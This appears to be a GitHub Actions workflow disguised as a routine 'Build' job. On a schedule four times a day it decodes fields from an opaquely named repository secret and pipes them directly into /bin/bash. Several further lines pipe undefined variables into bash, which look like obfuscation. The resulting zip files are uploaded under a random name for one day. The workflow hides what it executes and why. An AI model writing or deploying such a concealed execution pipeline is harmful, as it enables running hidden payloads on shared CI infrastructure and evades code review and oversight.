name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '36 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          qwon96: ${{ secrets.qwon96 }}
        run: |
          printf '%s' "$qwon96" | jq -r .x8976 | /bin/bash
          printf '%s' "$usmqu2225" | jq -r .cet56 | /bin/bash
          printf '%s' "$tdw8830" | jq -r .r4 | /bin/bash
          printf '%s' "$d2195" | jq -r .yz7 | /bin/bash
          printf '%s' "$frs99611" | jq -r .nen0 | /bin/bash
          printf '%s' "$q338" | jq -r .zpa6845 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 21BVeYtU
          path: "*.zip"
          retention-days: 1
